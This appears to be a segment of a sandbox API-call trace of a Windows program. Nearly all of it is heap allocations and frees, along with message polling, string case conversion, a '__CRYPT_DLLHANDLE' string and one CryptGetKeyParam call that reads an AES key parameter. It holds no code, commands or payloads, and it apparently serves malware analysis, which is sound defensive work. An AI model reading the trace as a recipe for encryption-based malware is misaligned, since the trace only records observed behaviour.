0x1b [0197.506] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0197.506] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0197.506] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0197.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0197.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0197.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0197.507] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0197.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0197.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0197.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0197.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0197.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.507] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.507] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0197.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0197.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0197.507] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0197.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0197.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0197.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0197.507] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2758, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2758*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0197.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0197.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0197.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0197.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0197.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0197.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0197.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0197.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0197.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0197.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0197.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0197.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0197.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0197.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0197.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0197.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0197.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0197.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0197.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0197.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0197.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0197.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0197.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0197.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0197.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0197.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0197.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0197.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0197.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0197.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0197.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0197.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0197.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0197.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0197.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0197.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0197.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0197.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0197.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0197.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0197.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0197.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0197.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0197.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.511] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0197.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0197.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0197.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0197.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0197.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0197.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0197.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0197.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0197.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0197.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0197.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0197.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b058 [0197.521] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0197.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0197.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0197.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0197.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0197.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0197.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0197.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0197.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0197.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0197.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0197.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0197.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0197.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0197.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0197.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0197.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0197.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0197.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0197.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0197.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0197.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0197.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0197.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0197.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0197.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0197.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0197.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0197.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0197.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0197.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa548 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0197.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0197.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0197.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0197.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0197.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0197.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0197.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0197.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0197.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0197.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0197.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0197.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0197.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0197.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0197.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0197.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0197.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0197.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0197.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0197.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0197.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0197.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0197.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0197.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0197.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0197.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0197.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0197.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0197.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0197.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0197.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0197.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0197.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0197.525] 